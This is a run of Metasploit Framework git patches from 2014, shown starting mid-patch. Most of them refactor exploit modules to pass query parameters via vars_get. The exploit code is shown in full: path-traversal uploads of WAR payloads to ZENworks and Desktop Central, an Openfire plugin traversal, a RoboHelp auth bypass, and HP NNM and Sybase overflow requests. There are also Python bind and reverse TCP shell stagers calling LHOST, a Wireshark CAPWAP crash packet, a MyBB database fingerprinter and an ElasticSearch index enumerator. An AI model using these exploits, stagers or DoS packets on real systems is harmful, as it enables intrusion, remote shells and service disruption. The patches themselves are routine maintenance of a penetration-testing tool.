Msf::Exploit::Remote if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, - 'headers' => - { - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), + 'headers' => { + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'deleteplugin' => plugin_name.downcase + } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 9953aa07b0..70988f9cd5 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -64,15 +64,17 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi( { - 'uri' => '/robohelp/server?PUBLISH=' + uid, + 'uri' => '/robohelp/server', 'version' => '1.1', 'method' => 'POST', 'data' => file, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, - 'UID' => uid, - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, + 'UID' => uid, + }, + 'vars_get' => { + 'PUBLISH' => uid + } }, 5) if ( res and res.message =~ /OK/ ) @@ -80,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...") data = send_request_raw({ - 'uri' => '/robohelp/robo/reserved/web/' + id + '/' + page , + 'uri' => normalize_uri('robohelp', 'robo','reserved', 'web', id, page), 'method' => 'GET', - 'version' => '1.0', + 'version' => '1.0' }, 5) handler diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 7ddae4d011..63f07cc9c6 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -46,10 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(filename, contents) res = send_request_cgi({ - 'uri' => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#{filename}"), - 'method' => 'POST', - 'data' => contents, - 'ctype' => "text/html" + 'uri' => normalize_uri('agentLogUploader'), + 'method' => 'POST', + 'data' => contents, + 'ctype' => 'text/html', + 'vars_get' => { + 'computerName' => 'DesktopCentral', + 'domainName' => 'webapps', + 'customerId' => '..', + 'filename' => filename + } }) if res and res.code == 200 and res.body.to_s.empty? diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96f1cb3d2a..14471183de 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -83,9 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") send_request_cgi({ - 'uri' => "/OvCgi/ovalarm.exe?OVABverbose=1", + 'uri' => '/OvCgi/ovalarm.exe', 'method' => "GET", - 'headers' => { 'Accept-Language' => sploit } + 'headers' => { + 'Accept-Language' => sploit + }, + 'vars_get' => { + 'OVABverbose' => '1' + } }, 3) handler diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 730b89f9a9..0f6fa1e789 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -68,10 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, - 'method' => 'GET', - 'headers' => { - 'Accept' => '*/*', + 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), + 'method' => 'GET', + 'headers' => { + 'Accept' => '*/*', + }, + 'vars_get' => { + crash => nil } }, 5) diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 9d675fec6a..728544b5bc 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -66,16 +66,17 @@ class Metasploit3 < Msf::Exploit::Remote war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s - res = send_request_cgi( - { - 'uri' => "/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war", - 'method' => 'POST', - 'data' => war_data, - 'headers' => - { - 'Content-Type' => 'application/octet-stream', - } - }) + res = send_request_cgi({ + 'uri' => '/zenworks/UploadServlet', + 'method' => 'POST', + 'data' => war_data, + 'headers' => { + 'Content-Type' => 'application/octet-stream', + }, + 'vars_get' => { + 'filename' => "../../webapps/#{app_base}.war" + } + }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 64c917fea2..14f13a776d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -190,6 +190,8 @@ describe Rex::Proto::Http::ClientRequest do 'bar' => 'baz', 'frobnicate' => 'the froozle?', 'foshizzle' => 'my/nizzle', + 'asdf' => nil, + 'test' => '' } end @@ -217,6 +219,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the froozle?") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end @@ -229,6 +233,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end From b5c567c4628455a5f15c9eb24c224f0fd07c9f37 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 25 May 2014 14:03:45 -0500 Subject: [PATCH 33/47] Update bind_tcp.rb --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index cd9422023c..50e8974123 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "s.listen(1)\n" cmd += "c,a=s.accept()\n" From 77f66f8510fc62eb9e5f7a2e85417f7edc1b84ca Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 25 May 2014 14:04:54 -0500 Subject: [PATCH 34/47] Update reverse_tcp.rb --- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 765dc00f34..4f741f0c52 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "l=struct.unpack('>I',s.recv(4))[0]\n" cmd += "d=s.recv(4096)\n" From 77e70d8bbeee1f8199009c12a50f79a342d50311 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sun, 25 May 2014 16:28:40 -0400 Subject: [PATCH 35/47] Add 2 more variables for meterpreter irb --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 6766ce7e7f..28138c8c25 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -314,6 +314,8 @@ class Console::CommandDispatcher::Core print_status("Starting IRB shell") print_status("The 'client' variable holds the meterpreter client\n") + session = client + framework = client.framework Rex::Ui::Text::IrbShell.new(binding).run end From d3c17d8e3e9f27305d3df838603e57df451e0107 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 25 May 2014 18:39:53 -0500 Subject: [PATCH 36/47] Delete wireshark_capwap_dos --- .../dos/wireshark/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb deleted file mode 100644 index 603f5e81ca..0000000000 --- a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb +++ /dev/null @@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 33ba1341474fed4cb31bbe0dc348c979dc3784d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 25 May 2014 18:52:01 -0500 Subject: [PATCH 37/47] Clean msftidy warnings and metadata --- modules/auxiliary/dos/wireshark/capwap.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 6555ab5dcf..c777d21b92 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -12,27 +12,28 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. + This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 + to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an + incomplete packet. }, 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Auxiliary msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + 'Laurent Butti', # Discovery vulnerability + 'j0sm1' # Auxiliary msf module ], 'References' => [ - [ 'CVE', '2013-4074'], + ['CVE', '2013-4074'], + ['OSVDB', '94091'], + ['BID', '60500'] ], 'DisclosureDate' => 'Apr 28 2014')) - # Protocol capwap needs port 5247 to trigger the dissector in wireshark register_options([ Opt::RPORT(5247) ], self.class) - end def run @@ -41,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # We send a packet incomplete to crash dissector print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") - # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then # the dissector crash # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 38/47] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? @@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 0133e861f84e8cea3f34cfdf38464990ff8dd14c Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 26 May 2014 23:55:20 -0500 Subject: [PATCH 39/47] Fix typo --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 4336909510..e2d425c6c9 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -115,7 +115,7 @@ class ClientRequest qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - # support get paraemter without value + # support get parameter without value # Example: uri?parameter if val val = val.to_s From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:14:55 -0500 Subject: [PATCH 40/47] Do last code cleaning --- modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++----------- 1 file changed, 26 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index dd8a585a7a..f127e03616 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 41/47] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 42/47] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = "PHP #{php_version}" + php_version = "#{php_version}" else php_version = "PHP version unknown" end From 1316365c2ff2179bfa63f38fe12ce7343ba40855 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:22:39 -0500 Subject: [PATCH 43/47] Fix description --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 6dbdfeb160..be3a6b5acc 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -13,7 +13,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to - force an error and fingerprint the backend database used by MyBB. + force an error and fingerprint the backend database used by MyBB on version 1.6.12 + and prior. }, 'Author' => [ From 69e82868387cf365021a0a51bd4e963710e7f1ce Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:29:32 -0500 Subject: [PATCH 44/47] Fix title --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index be3a6b5acc..a2beedb07c 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'MyBB Database Fingerprint', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to force an error and fingerprint the backend database used by MyBB on version 1.6.12 From cc1e81ecb75ba859e69c42eee2e3999686979e82 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 May 2014 10:29:55 -0500 Subject: [PATCH 45/47] Add sqlite3 to Gemfile Fixes all the post modules that require it to parse pilfered sqlite DB files. --- Gemfile | 6 ++++-- Gemfile.lock | 2 ++ 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 9045947d35..fdc185f439 100755 --- a/Gemfile +++ b/Gemfile @@ -10,12 +10,14 @@ gem 'json' gem 'msgpack' # Needed by anemone crawler gem 'nokogiri' +# Needed by db.rb and Msf::Exploit::Capture +gem 'packetfu', '1.1.9' # Needed by JSObfu gem 'rkelly-remix', '0.0.6' # Needed by anemone crawler gem 'robots' -# Needed by db.rb and Msf::Exploit::Capture -gem 'packetfu', '1.1.9' +# Needed for some post modules +gem 'sqlite3' group :db do # Needed for Msf::DbManager diff --git a/Gemfile.lock b/Gemfile.lock index 8c708c0467..5517e4fb79 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -53,6 +53,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) + sqlite3 (1.3.9) timecop (0.6.3) tzinfo (0.3.37) yard (0.8.7) @@ -82,5 +83,6 @@ DEPENDENCIES rspec (>= 2.12) shoulda-matchers simplecov (= 0.5.4) + sqlite3 timecop yard From 3de8beb5fd3bf5d2613205fbe3b8e7f84ae9fc55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 11:22:40 -0500 Subject: [PATCH 46/47] Clean code --- .../scanner/elasticsearch/es_enum.rb | 64 ++++++++++++++----- 1 file changed, 47 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 804cc8fcc9..12895c27bc 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -13,47 +13,77 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Description' => %q{ + This module enumerates ElasticSearch Indeces. It uses the REST API + in order to make it. + }, 'Author' => [ - 'Silas Cutler ' + 'Silas Cutler ' ], 'License' => MSF_LICENSE )) - + register_options( [ Opt::RPORT(9200) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) + vprint_status("#{peer} - Querying indeces...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) - - begin - json_body = JSON.parse(res.body) - rescue JSON::ParserError - print_error("Unable to parse JSON") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + vprint_error("#{peer} - Unable to establish connection") return end - if res and res.code == 200 and res.body.length > 0 - json_body.each do |index| - print_good("Index : " + index[0]) + if res && res.code == 200 && res.body.length > 0 + begin + json_body = JSON.parse(res.body) + rescue JSON::ParserError + vprint_error("#{peer} - Unable to parse JSON") + return end - - path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") - print_good("Results saved to #{path}") else - print_error("Failed to save the result") + vprint_error("#{peer} - Timeout or unexpected response...") + return end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + report_service( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'elasticsearch' + ) + + indeces = [] + + json_body.each do |index| + indeces.push(index[0]) + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "elasticsearch.index", + :data => index[0], + :update => :unique_data + ) end + + if indeces.length > 0 + print_good("#{peer} - ElasticSearch Indeces found: #{indeces.join(", ")}") + end + end + end From 2271afc1a5e7b8373067ff8d097791c523983ab5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 11:25:39 -0500 Subject: [PATCH 47/47] Change module filename --- .../scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} (100%) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb similarity index 100% rename from modules/auxiliary/scanner/elasticsearch/es_enum.rb rename to modules/auxiliary/scanner/elasticsearch/indeces_enum.rb